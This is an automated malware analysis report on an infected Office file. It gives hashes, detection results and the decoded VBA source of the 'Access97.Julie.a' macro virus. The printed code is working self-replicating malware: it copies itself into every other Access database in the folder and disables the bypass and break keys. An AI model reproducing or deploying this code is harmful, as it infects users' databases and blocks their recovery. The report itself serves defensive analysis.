Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b426b257ba64e1a…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 26.5 KB
Created: 2000-12-30 18:33:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 1f00e3ad6ece6ac6cb4effac3d1218cc
SHA-1: 569eb0e0b394780a2240d0460c8c75744a55be4e
SHA-256: 7b426b257ba64e1a26a7015fdf9c6b02b24e7a9d6e37574690d4ca15f477f6c0
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV and contains VBA macros. The macros appear to be designed to interact with Microsoft Access databases, specifically by exporting and importing macros and modules, potentially to spread or modify existing Access databases. The specific payload or ultimate goal beyond Access database manipulation is unclear from the provided script.

Heuristics (2)

  • ClamAV: Win.Trojan.A97M-5 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.A97M-5
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1168 bytes
SHA-256: a5fca28269d8b14d0488073cbaf88f88818f72497f2416d2422dead7c12e822d
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Option Compare Database
Option Explicit
Dim Julie As String
Function Julie()
On Error Resume Next
'Access97.Julie.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
CurrentDb.Properties("AllowBypassKey") = False
CurrentDb.Properties("AllowSpecialKeys") = False
CurrentDb.Properties("AllowBreakIntoCode") = False
Application.DisplayStatusBar = False
Julie = Dir("*.mdb", vbNormal)
Do While Julie <> ""
If CurDir & "\" & Julie <> CurrentDb.Name Then
DoCmd.TransferDatabase acExport, "Microsoft Access", Julie, acMacro, "AutoExec", "AutoExec"
DoCmd.TransferDatabase acExport, "Microsoft Access", Julie, acModule, "Julie", "Julie"
End If
On Error GoTo Exit_Payload
If Day(Now()) = Int(Rnd() * 28) + 1 Then
MsgBox "Access97.Julie.a", "Someday We Will All Have Perfect Wings"
End If
Exit_Payload:
Julie = Dir()
Loop
End Function